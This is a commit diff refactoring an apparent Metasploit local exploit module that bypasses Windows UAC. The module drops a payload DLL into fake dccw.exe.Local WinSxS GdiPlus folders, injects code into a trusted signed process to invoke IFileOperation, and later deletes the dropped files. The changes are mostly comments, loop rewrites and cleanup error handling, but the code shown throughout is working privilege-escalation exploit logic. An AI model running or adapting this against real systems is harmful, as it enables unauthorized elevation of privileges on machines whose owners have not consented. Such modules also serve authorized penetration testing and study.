Upload requested changes

L3cr0f · L3cr0f · commit 23831e6df93f · 2017-06-18T11:34:58.000+02:00
diff --git a/modules/exploits/windows/local/bypassuac_injection_winsxs.rb b/modules/exploits/windows/local/bypassuac_injection_winsxs.rb
@@ -97,8 +97,8 @@ def exploit
     run_injection(pid, dll_path, file_paths)
   end
 
+  # Path to the bypassuac binary and architecture payload checking
   def bypass_dll_path
-    # path to the bypassuac binary
     path = ::File.join(Msf::Config.data_directory, 'post')
 
     sysarch = sysinfo['Architecture']
@@ -117,6 +117,7 @@ def bypass_dll_path
     end
   end
 
+  # Check if the compromised user matches some requirements
   def check_permissions!
     # Check if you are an admin
     vprint_status('Checking admin status...')
@@ -138,6 +139,7 @@ def check_permissions!
     end
   end
 
+  # Inject and run the DLL within a trusted certificate signed process to invoke IFileOperation
   def run_injection(pid, dll_path, file_paths)
     vprint_status("Injecting #{datastore['DLL_PATH']} into process ID #{pid}")
     begin
@@ -184,7 +186,7 @@ def upload_payload_dll(payload_filepath, directoryNames)
     payload = generate_payload_dccw_gdiplus_dll({:dll_exitprocess => true})
     print_status('Uploading the Payload DLL to the filesystem...')
     begin
-      vprint_status("Payload DLL #{payload.length} bytes long being uploaded..")
+      vprint_status("Payload DLL #{payload.length} bytes long being uploaded...")
       write_file(dllPath, payload)
     rescue Rex::Post::Meterpreter::RequestError => e
       fail_with(Failure::Unknown, "Error uploading file #{directoryNames[0]}: #{e.class} #{e}")
@@ -195,21 +197,23 @@ def upload_payload_dll(payload_filepath, directoryNames)
     end
   end
 
+  # Copy our DLL to all created folders, the first folder already have a copy of the DLL
   def copy_payload_dll(directoryNames, dllPath)
-    for i in 1 .. directoryNames.size - 1
+    1.step(directoryNames.size - 1, 1) do |i|
       if client.railgun.kernel32.CopyFileA(dllPath, "#{directoryNames[i]}\\GdiPlus.dll", false)['return'] == false
         print_error("Error! Cannot copy the payload to all the necessary folders! Continuing just in case it works...")
       end
     end
   end
 
+  # Check if the environment is vulnerable to the exploit
   def validate_environment!
     fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
 
     winver = sysinfo['OS']
 
     case winver
-    when /Windows (8|2008|2012|10)/
+    when /Windows (8|10)/
       print_good("#{winver} may be vulnerable.")
     else
       fail_with(Failure::NotVulnerable, "#{winver} is not vulnerable.")
@@ -235,9 +239,9 @@ def create_directories(payload_filepath, directoryNames)
       fail_with(Failure::Unknown, "Cannot create the directory \"#{env_vars['TEMP']}dccw.exe.Local\"")
     end
 
-    for i in 0 .. directoryNames.size - 1
-      if client.railgun.kernel32.CreateDirectoryA(directoryNames[i], nil)['return'] == 0
-        fail_with(Failure::Unknown, "Cannot create the directory \"#{env_vars['TEMP']}dccw.exe.Local\\#{directoryNames[i]}\"")
+    directoryNames.each do |dirName|
+      if client.railgun.kernel32.CreateDirectoryA(dirName, nil)['return'] == 0
+        fail_with(Failure::Unknown, "Cannot create the directory \"#{env_vars['TEMP']}dccw.exe.Local\\#{dirName}\"")
       end
     end
   end
@@ -253,19 +257,23 @@ def get_directories(payload_filepath, targetedDirectories)
     if hFile['return'] == client.railgun.const("INVALID_HANDLE_VALUE")
       fail_with(Failure::Unknown, "Cannot get the targeted directories!")
     end
-    findFileData = hFile['lpFindFileData']
 
-    begin
+    findFileData = hFile['lpFindFileData']
+    moreFiles = true
+    until moreFiles == false do
       fileAttributes = findFileData[0, 4].unpack('V').first
       andOperation = fileAttributes & client.railgun.const("FILE_ATTRIBUTE_DIRECTORY")
       if andOperation
-        path = "#{payload_filepath}\\#{normalize_path(findFileData[fileNamePadding, fileNamePadding + maxPath])}"
+        #Removes the remainder part composed of 'A' of the path and the last null character
+        normalizedData = findFileData[fileNamePadding, fileNamePadding + maxPath].split('AAA')[0]
+        path = "#{payload_filepath}\\#{normalizedData[0, normalizedData.length - 1]}"
         directoryNames.push(path)
-    end
+      end
 
-    findNextFile = client.railgun.kernel32.FindNextFileA(hFile['return'], findFileDataSize)
-    findFileData = findNextFile['lpFindFileData']
-    end while findNextFile['return'] != false
+      findNextFile = client.railgun.kernel32.FindNextFileA(hFile['return'], findFileDataSize)
+      moreFiles = findNextFile['return']
+      findFileData = findNextFile['lpFindFileData']
+    end
 
     if findNextFile['GetLastError'] != client.railgun.const("ERROR_NO_MORE_FILES")
       fail_with(Failure::Unknown, "Cannot get the targeted directories!")
@@ -274,16 +282,7 @@ def get_directories(payload_filepath, targetedDirectories)
     directoryNames
   end
 
-  #Removes the remainder part composed of 'A' of the path
-  def normalize_path(path)
-    counter = 0
-    while path[counter] != 'A' and path[counter + 1] != 'A' and path[counter + 2] != 'A' do
-    counter = counter + 1
-    end
-
-    path[0, counter + 1]
-  end
-
+  # Store the necessary paths into a struct
   def get_file_paths(win_path, payload_filepath)
     paths = {}
     paths[:szElevDll] = 'dccw.exe.Local'
@@ -300,7 +299,7 @@ def get_file_paths(win_path, payload_filepath)
   # the dll needs to copy/execute etc.
   def create_struct(paths)
 
-    # write each path to the structure in the order they
+    # Write each path to the structure in the order they
     # are defined in the bypass uac binary.
     struct = ''
     struct << fill_struct_path(paths[:szElevDir])
@@ -318,6 +317,7 @@ def fill_struct_path(path)
     path + "\x00" * (520 - path.length)
   end
 
+  # When a new session is obtained, it removes the dropped elements (files and folders)
   def on_new_session(session)
     if session.type == 'meterpreter'
       session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
@@ -328,7 +328,6 @@ def on_new_session(session)
   # Remove all the created and dropped files and folders
   def remove_dropped_elements(session)
     droppedElements = []
-    successfullyRemoved = true
 
     env_vars = get_envs('TEMP', 'WINDIR')
     payload_filepath = "#{env_vars['TEMP']}\\dccw.exe.Local"
@@ -343,39 +342,88 @@ def remove_dropped_elements(session)
     directoryNames = get_directories(payload_filepath, targetedDirectories)
     file_paths = get_file_paths(env_vars['WINDIR'], payload_filepath)
 
-    # Remove "GdiPlus.dll" from "C:\%TEMP%\dccw.exe.Local\*_microsoft.windows.gdiplus_*\"
-    # and "C:\Windows\System32\dccw.exe.Local\*_microsoft.windows.gdiplus_*\"
-    for i in 0 .. directoryNames.size - 1
-      directoryName = directoryNames[i].split("\\").last
+    # Remove all dropped elements (files and folders)
+    remove_dlls(session, directoryNames, file_paths, droppedElements)
+    remove_winsxs_folders(session, directoryNames, file_paths, droppedElements)
+    remove_dot_local_folders(session, file_paths, droppedElements)
+
+    # Check if the removal was successful
+    removal_checking(droppedElements)
+  end
+
+  # Remove "GdiPlus.dll" from "C:\%TEMP%\dccw.exe.Local\*_microsoft.windows.gdiplus_*\"
+  # and "C:\Windows\System32\dccw.exe.Local\*_microsoft.windows.gdiplus_*\"
+  def remove_dlls(session, directoryNames, file_paths, droppedElements)
+    directoryNames.each do |dirName|
+      directoryName = dirName.split("\\").last
+
+      begin
+        droppedElements.push("#{dirName}\\GdiPlus.dll")
+        session.fs.file.rm("#{dirName}\\GdiPlus.dll")
+      rescue ::Rex::Post::Meterpreter::RequestError => e
+        vprint_error("Error => #{e.class} - #{e}")
+      end
 
-      droppedElements.push("#{directoryNames[i]}\\GdiPlus.dll")
-      session.fs.file.rm("#{directoryNames[i]}\\GdiPlus.dll") rescue nil
-      droppedElements.push("#{file_paths[:szElevDllFull]}\\#{directoryName}\\GdiPlus.dll")
-      session.fs.file.rm("#{file_paths[:szElevDllFull]}\\#{directoryName}\\GdiPlus.dll") rescue nil
+      begin
+        droppedElements.push("#{file_paths[:szElevDllFull]}\\#{directoryName}\\GdiPlus.dll")
+        session.fs.file.rm("#{file_paths[:szElevDllFull]}\\#{directoryName}\\GdiPlus.dll")
+      rescue ::Rex::Post::Meterpreter::RequestError => e
+        vprint_error("Error => #{e.class} - #{e}")
+      end
     end
+  end
+
+  # Remove folders from "C:\%TEMP%\dccw.exe.Local\" and "C:\Windows\System32\dccw.exe.Local\"
+  def remove_winsxs_folders(session, directoryNames, file_paths, droppedElements)
+    directoryNames.each do |dirName|
+      directoryName = dirName.split("\\").last
+
+      begin
+        droppedElements.push(dirName)
+        session.fs.dir.rmdir(dirName)
+      rescue ::Rex::Post::Meterpreter::RequestError => e
+        vprint_error("Error => #{e.class} - #{e}")
+      end
 
-    # Remove folders from "C:\%TEMP%\dccw.exe.Local\" and "C:\Windows\System32\dccw.exe.Local\"
-    for i in 0 .. directoryNames.size - 1
-      directoryName = directoryNames[i].split("\\").last
+      begin
+        droppedElements.push("#{file_paths[:szElevDllFull]}\\#{directoryName}")
+        session.fs.dir.rmdir("#{file_paths[:szElevDllFull]}\\#{directoryName}")
+      rescue ::Rex::Post::Meterpreter::RequestError => e
+        vprint_error("Error => #{e.class} - #{e}")
+      end
+    end
+  end
 
-      droppedElements.push(directoryNames[i])
-      session.fs.dir.rmdir(directoryNames[i]) rescue nil
-      droppedElements.push("#{file_paths[:szElevDllFull]}\\#{directoryName}")
-      session.fs.dir.rmdir("#{file_paths[:szElevDllFull]}\\#{directoryName}") rescue nil
+  # Remove "C:\Windows\System32\dccw.exe.Local" folder
+  def remove_dot_local_folders(session, file_paths, droppedElements)
+    begin
+      droppedElements.push(file_paths[:szTempDllPath])
+      session.fs.dir.rmdir(file_paths[:szTempDllPath])
+    rescue ::Rex::Post::Meterpreter::RequestError => e
+      vprint_error("Error => #{e.class} - #{e}")
     end
 
-    # Remove "C:\Windows\System32\dccw.exe.Local" folder
-    droppedElements.push(file_paths[:szTempDllPath])
-    session.fs.dir.rmdir(file_paths[:szTempDllPath]) rescue nil
-    droppedElements.push(file_paths[:szElevDllFull])
-    session.fs.dir.rmdir(file_paths[:szElevDllFull]) rescue nil
-
-    # Check if have been successfully removed
-    for i in 0 .. droppedElements.size - 1
-      stat = session.fs.file.stat(droppedElements[i]) rescue nil
-      if stat
-        print_error("Unable to delete #{droppedElements[i]}!")
-        successfullyRemoved = false
+    begin
+      droppedElements.push(file_paths[:szElevDllFull])
+      session.fs.dir.rmdir(file_paths[:szElevDllFull])
+    rescue ::Rex::Post::Meterpreter::RequestError => e
+      vprint_error("Error => #{e.class} - #{e}")
+    end
+  end
+
+  # Check if have been successfully removed
+  def removal_checking(droppedElements)
+    successfullyRemoved = true
+
+    droppedElements.each do |element|
+      begin
+        stat = session.fs.file.stat(element)
+        if stat
+          print_error("Unable to delete #{element}!")
+          successfullyRemoved = false
+        end
+      rescue ::Rex::Post::Meterpreter::RequestError => e
+        vprint_error("Error => #{e.class} - #{e}")
       end
     end
 
@@ -385,5 +433,4 @@ def remove_dropped_elements(session)
       print_warning("Could not delete some dropped elements! They will require manual cleanup on the target")
     end
   end
-
 end
